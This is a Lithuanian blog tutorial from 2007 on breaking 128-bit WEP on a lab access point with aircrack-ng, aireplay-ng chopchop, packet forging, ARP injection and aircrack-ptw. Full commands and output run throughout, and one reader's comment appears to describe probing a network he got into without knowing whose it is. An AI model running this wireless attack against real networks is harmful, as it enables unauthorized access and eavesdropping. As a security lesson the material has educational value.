WEP įveikimas (scenarijus B)

2007-04-16

WEP įveikimas (scenarijus B)

Filed under: hacking, wifi — Almantas Karvelis @ 11:10

tęsiant temą:

SCENARIJUS B

- Linksys AP su 128 bitų WEP šifravimu
- Nėra prisijungusių klientu, AP izoliuotas
- Atakuojantis hostas su ralink USB korta
- Atakai naudosime aircrack-ng programų paketą ir aircrack-ptw (proceso paspartinimui)

Vietoje standartinio rt2570 geriau naudoti speciaų RaLink RT2570USB Enhanced draiverį:

root@base:/base/src/drivers/rt2570# wget \\
http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt2570-k2wrlz-1.5.1.tar.bz2
rt2570# tar -jxvf rt2570-k2wrlz-1.5.1.tar.bz2
rt2570# cd rt2570-k2wrlz-1.5.1/Module

Pataisome Makefile, kad modulis turėtu kitą pavadinimą nei originalus, kompiliuojame ir padedame į žinomą vietą:

Module# cat Makefile.orig | sed 's/^MODULE_NAME := rt2570/MODULE_NAME := rt2570alt/' > Makefile
Module# make Module# cp rt2570alt.ko /base/drivers/

Įkišame kortą ir užkrauname draiverį:

root@base:~# lsmod | grep rt2570
rt2570                162592  0
usbcore               121768  3 rt2570,uhci_hcd
root@base:~# modprobe -r rt2570
root@base:~# insmod /base/drivers/rt2570alt.ko
root@base:~# lsmod | grep rt2570
rt2570alt             163232  0
usbcore               121768  3 rt2570alt,uhci_hcd

Pasikeičiame MAC adresą pasinaudoję nauju macchanger funkcionalumu:

root@base:~# macchanger -w rausb0
Current MAC: 00:00:00:00:00:00 (XEROX CORPORATION)
Faked MAC:   00:50:da:0d:11:dc [wireless] (3Com)

root@base:~# ifconfig rausb0 up
root@base:~# iwlist rausb0 scan
rausb0    Scan completed :
          Cell 01 - Address: 00:18:F8:65:2C:F8
                    Mode:Managed
                    ESSID:”lab-wep”
                    Encryption key:on
                    Channel:9

Tai yra mūsų taikinys. Perjungiame interfeisą į monitor modą:

root@base:~# airmon-ng start rausb0 9

Interface       Chipset         Driver

rausb0          Ralink USB      rt2570 (monitor mode enabled)

Asocijuojames, kad galėtume įterpti freimus (paliekame ta terminalą po ranka - jei darbai užtruktų, prieš kiekvieną įterpimo procedūrą reikėtų pakartoti acociacią):

root@base:~# aireplay-ng -1 0 -e lab-wep -a 00:18:F8:65:2C:F8 -h 00:50:da:0d:11:dc rausb0
23:43:00  Sending Authentication Request
23:43:00  Authentication successful
23:43:00  Sending Association Request
23:43:05  Sending Authentication Request
23:43:05  Authentication successful
23:43:05  Sending Association Request
23:43:05  Association successful :-)

Kadangi mūsų AP dabar izoliuotas ir neturi klientų, ARP trafiko pro jį, reikalingo pradėti įterpimą, mes nesulauksime. Mums belieka patiems sugeneruoti netikrą ARP užklausą, įterpti ją ir priversti AP atsakyti. Taigi, kitoje konsoleje bandome “chopchop” ataką:

root@base:~# aireplay-ng -4 -b 00:18:F8:65:2C:F8 -h 00:50:da:0d:11:dc rausb0
Read 380 packets...

        Size: 352, FromDS: 1, ToDS: 0 (WEP)

             BSSID  =  00:18:F8:65:2C:F8
         Dest. MAC  =  01:00:5E:7F:FF:FA
        Source MAC  =  00:18:F8:65:2C:F5

        0x0000:  0842 0000 0100 5e7f fffa 0018 f865 1bb9  .B....^.....e..
        0x0010:  0018 f865 1bb7 8055 3405 0000 8b7d f74a  ...e...U4....}.J
        0x0020:  dd08 b8ba 20f0 3460 99cd 0778 7f8b 404e  .... .4`...x.@N
        0x0030:  ec2e 814a ec59 d66c e0ed a812 7a64 e85d  ...J.Y.l....zd.]
        0x0040:  d9b6 8f85 7344 70c4 db6a c58d 08c9 6832  ....sDp..j....h2
        0x0050:  3e37 7a60 3ca8 9c82 5a59 5b84 e935 5d7d  >7z`

Generuojame ARP paketą

root@base:~# packetforge-ng -0 -a 00:18:F8:65:2C:F8 -h 00:50:da:0d:11:dc \\
                             -k 255.255.255.255 -l 255.255.255.255.255 \\
                             -y replay_dec-0415-235509.xor -w arp-request
Wrote packet to: arp-request

Kitame terminale paleidžiame airodump-ng. Kadangi naudosime aircrack-ptw, o jis tirba tik su .cap failais, nenaudojame –ivs rakto.

root@base:~# airodump-ng -c 9 rausb0 --bssid 00:18:F8:65:2C:F8 -w captureB rausb0

 CH  9 ][ Elapsed: 9 s ][ 2007-04-16 00:05

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ES

 00:18:F8:65:2C:F8   73 100       63       11    0   9  54. WEP  WEP         l

 BSSID              STATION            PWR  Lost  Packets  Probes

Grįžtame prie "chopchop" atakos metu sukonstruoto netikro ARP paketo, ir bandome įterpinėti (prieš tai pakartoję asociaciją su AP kitame terminale, kurį buvome paruošę pačioje pradžioje):

root@base:~# aireplay-ng -2 -r arp-request rausb0
open(/dev/rtc) failed: No such file or directory

        Size: 68, FromDS: 0, ToDS: 1 (WEP)

             BSSID  =  00:18:F8:65:2C:F8
         Dest. MAC  =  FF:FF:FF:FF:FF:FF
        Source MAC  =  00:50:DA:0D:11:DC

        0x0000:  0841 0201 0018 f865 1bb9 0050 da0d 11dc  .A.....e...P....
        0x0010:  ffff ffff ffff 8001 3405 0000 8b7d f74a  ........4....}.J
        0x0020:  dd08 b8bc 65f1 3d58 9aff 0779 7eca 9b9f  ....e.=X...y~...
        0x0030:  3d5a 7fb4 fc59 2996 e9db af7e 84bf 8b62  =Z..Y)....~...b
        0x0040:  5e00 3cd3                                ^.

airodump-ng lange turime matyti dramatiškai didėjantį #Data ir #/s. Jeigu ne - reikėtų pakartoti asociaciją:

root@base:~# aireplay-ng -1 0 -e lab-wep -a 00:18:F8:65:2C:F8 -h 00:50:da:0d:11:dc rausb0

Periodiskai, laisvame terminale, bandome paleisti aircrack-ptw :

root@base:~# aircrack-ptw captureB-01.cap

Mano atveju aircrack-ptw įveikė 128 bitų WEP raktą po 3 minučių duomenų rinkimo, gavęs tik ~30000 Data paketų:

root@base:~# aircrack-ptw captureB-01.cap
This is aircrack-ptw 1.0.0
For more informations see http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
allocating a new table
bssid = 00:18:F8:65:2C:F8  keyindex=0
stats for bssid 00:18:F8:65:2C:F8  keyindex=0 packets=32766
Found key with len 13: 56 DB C5 39 20 01 F1 C2 EC 64 E9 D6 4B

airodump-ng langas tuo momentu atrodė taip:

CH  9 ][ Elapsed: 3 mins ][ 2007-04-16 00:08

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ES

 00:18:F8:65:2C:F8   63  96     2244    33965  162   9  54. WEP  WEP         l

 BSSID              STATION            PWR  Lost  Packets  Probes

2 Comments »

Pagaliau atsirado profesionaliai paruosta informacija lietuviu kalba apie wifi tinklu sauguma.Vertingas puslapis.

Pagarba

Comment by Darius — 2007-05-08 @ 22:44
Tai tikrai nera sudetinga! Tik mano bcm43xx plokste su packet injection yra broken, patch’ai nepadeda.

Todel ka jau padarysi reikia ilgai laukti kad sugaudyti paketus.

Bet turiu klausyma. Iejau i tinkla. DHCP tarnybos nera. beje airmon rodo 4 client’us su savo hw adresais. Taciau niekaip nerandu gataway. Tiesiog tcpdump -i eth1 -vv rodo daug paketu. Taciau visi adresai yra isoriniai. Ir as negaliu prieit prie ju. O gal tam tinkle veikia koks openvpn ? ar panasus sh ? kad as negaliu rasti ne gyvos dvasios ?

beje tiksliai nieko nezinau del mac changer.

nes budamas be interneto skaiciau `man ifconfig` . Ir funkcija pakeist mac’a ifconfig eth1 hw ether 00:::::00 . Tiesa man neleido to padaryt atceit invalid argument. Nors su eth0 kuo puikiausiai veikia.

Dekui uz issamu straipsni. Aisku angliskoj versijoj yra tas pats. aisku sveikintina..

Comment by kestaz@mac.com — 2007-07-17 @ 09:23

RSS feed for comments on this post. TrackBack URI

random hackery

2007-04-16

WEP įveikimas (scenarijus B)

2 Comments »

Leave a comment